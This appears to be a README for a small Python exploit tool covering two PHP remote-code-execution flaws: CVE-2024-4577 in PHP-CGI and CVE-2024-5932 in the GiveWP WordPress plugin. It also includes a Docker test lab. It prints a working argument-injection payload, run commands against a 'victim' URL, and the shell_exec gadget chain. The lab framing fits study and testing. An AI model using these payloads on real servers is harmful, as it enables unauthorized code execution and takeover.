A tool similar to Metasploit (but far simpler), containing 2 PHP exploits and executing them. We don't implement GUI.
-
Exploring 2 different PHP vulnerabilities
-
System and PHP version detection
-
Exploitation
-
Good webshell or possibility to run shellcode
-
Docker containers usage for testing
This Python PoC abuses PHP-CGI’s argument parsing (CVE-2024-4577) to get RCE in two steps:
- Flag Injection: It appends
?%ADd+allow_url_include=1+-d+auto_prepend_file=php://input
to trick PHP-CGI into including anything sent in the request body.
- Payload Delivery: The attacker’s PHP snippet (e.g. ) is sent in a POST to that URL, runs immediately, and echoes a marker (1337) to confirm success.
Run it like:
python exploit.py --target http://victim/index.php \
--code "<?php system('id'); ?>"
- System locales are needed to be set to japanese or chinese, otherwise the exploit will not work.
CVE-2024-5932 is a critical PHP Object Injection flaw in the GiveWP – Donation Plugin and Fundraising Platform (WordPress), affecting all versions through 3.14.1. The vulnerability stems from unsafe deserialization of the give_title parameter, allowing an attacker to inject a crafted PHP object chain. By embedding a reference to shell_exec inside the payload, an unauthenticated attacker can execute arbitrary system commands or delete files on the server.
The sole exploit file is CVE20245932rce.py, which operates as follows:
It retrieves the donation page, uses BeautifulSoup to extract hidden form fields (give-form-id, give-form-hash, give-price-id, donation amount) and generates fake donor data via Faker.
It builds a serialized PHP object chain (Stripe\StripeObject → GiveInsertPaymentData → Give → ValidGenerator) with the validator property set to shell_exec(""), where “” can be a file path or system instruction.
It sends a POST request to /wp-admin/admin-ajax.php with give_title=, forcing GiveWP to deserialize and immediately execute the embedded command. Version 3.14.2 of GiveWP adds proper sanitization for give_title, preventing this exploit.
- docker-compose.yml
services:
db:
image: mysql:8.0.27
command: '--default-authentication-plugin=mysql_native_password'
restart: always
environment:
- MYSQL_ROOT_PASSWORD=somewordpress
- MYSQL_DATABASE=wordpress
- MYSQL_USER=wordpress
- MYSQL_PASSWORD=wordpress
expose:
- 3306
- 33060
wordpress:
image: wordpress:6.3.2
ports:
- 80:80
restart: always
environment:
- WORDPRESS_DB_HOST=db
- WORDPRESS_DB_USER=wordpress
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_NAME=wordpress
volumes:
db_data:
-
Then download vulnerable GiveWP plugin: https://downloads.wordpress.org/plugin/give.3.14.1.zip
-
Unzip it to the
wp-content/pluginsdirectory of your WordPress installation.
docker cp give docker-wordpress-1:/var/www/html/wp-content/plugins
-
Activate the GiveWP plugin
-
Add new post with GiveWP plugin and copy the post link
-
Check the vulnerable link
-
Run the exploit - example:
python3 main.py -u http://localhost/
Give full url for givewp plugin form:
http://localhost/donations/test-form/
Command to run:
touch /tmp/test.txt